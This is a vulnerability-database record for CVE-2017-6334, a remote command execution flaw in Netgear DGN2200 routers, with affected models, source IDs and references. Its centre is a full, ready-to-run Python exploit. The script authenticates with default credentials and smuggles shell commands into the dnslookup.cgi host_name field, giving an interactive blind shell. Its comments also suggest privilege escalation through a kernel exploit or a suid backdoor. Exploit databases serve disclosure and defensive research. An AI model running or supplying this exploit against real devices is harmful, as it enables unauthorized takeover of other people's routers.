ID
VAR-E-201702-0149
CVE
| cve_id: | CVE-2017-6334 | Trust: 2.3 |
EDB ID
41459
TITLE
Netgear DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Netgear DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution. CVE-2017-6334 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | netgear | model: | dgn2200v1/v2/v3/v4 | scope: | - | version: | - | Trust: 1.6 |
| vendor: | netgear | model: | dgn2200 dnslookup.cgi | scope: | - | version: | - | Trust: 0.5 |
| vendor: | netgear | model: | dgn2201 dnslookup.cgi remote | scope: | eq | version: | v1/v2/v3/v4 | Trust: 0.5 |
| vendor: | netgear | model: | dgn2200v4 | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | netgear | model: | dgn2200v3 | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | netgear | model: | dgn2200v2 | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | netgear | model: | dgn2200v1 | scope: | eq | version: | 0 | Trust: 0.3 |
EXPLOIT
#!/usr/bin/python
#Provides access to default user account, privileges can be easily elevated by using either:
# - a kernel exploit (ex. memodipper was tested and it worked)
# - by executing /bin/bd (suid backdoor present on SOME but not all versions)
# - by manipulating the httpd config files to trick the root user into executing your code (separate advisory will be released soon)
#Pozdrawiam: Kornela, Komara i Sknerusa
import sys
import requests
#You can change these credentials to ex. Gearguy/Geardog or Guest/Guest which are hardcoded on SOME firmware versions
#These routers DO NOT support telnet/ssh access so you can use this exploit to access the shell if you want to
login = 'admin'
password = 'password'
def main():
if len(sys.argv) < 2:
print "./netgearpwn_2.py <router ip>"
return
spawnShell()
def execute(cmd): #Escaping basic sanitization
requests.post("http://" + sys.argv[1] + "/dnslookup.cgi", data={'host_name':"www.google.com; " + cmd, 'lookup': "Lookup"}, auth=(login, password))
return
def spawnShell():
print "Dropping a shell-like environment (blind OS injection)"
print "To test it type 'reboot'"
while True:
cmd = raw_input("[blind $] ")
execute(cmd)
if __name__ == "__main__":
main()
#2017-02-25 by SivertPL
#Tak, to ja.
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'dnslookup.cgi' Remote Command Execution
Trust: 1.6
TAGS
| tag: | exploit | Trust: 1.0 |
| tag: | remote | Trust: 0.5 |
| tag: | cgi | Trust: 0.5 |
CREDITS
SivertPL
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2017-6334 | Trust: 2.3 |
| db: | EXPLOIT-DB | id: | 41459 | Trust: 1.6 |
| db: | EDBNET | id: | 91308 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 143128 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 141337 | Trust: 0.5 |
| db: | BID | id: | 96463 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2017-6334 | Trust: 2.0 |
| url: | https://www.exploit-db.com/exploits/41459/ | Trust: 0.6 |
| url: | http://www.netgear.com | Trust: 0.3 |
SOURCES
| db: | BID | id: | 96463 |
| db: | PACKETSTORM | id: | 143128 |
| db: | PACKETSTORM | id: | 141337 |
| db: | EXPLOIT-DB | id: | 41459 |
| db: | EDBNET | id: | 91308 |
LAST UPDATE DATE
2022-07-27T09:11:33.348000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 96463 | date: | 2017-03-07T01:08:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 96463 | date: | 2017-02-26T00:00:00 |
| db: | PACKETSTORM | id: | 143128 | date: | 2017-06-24T17:45:41 |
| db: | PACKETSTORM | id: | 141337 | date: | 2017-02-26T05:55:55 |
| db: | EXPLOIT-DB | id: | 41459 | date: | 2017-02-25T00:00:00 |
| db: | EDBNET | id: | 91308 | date: | 2017-02-27T00:00:00 |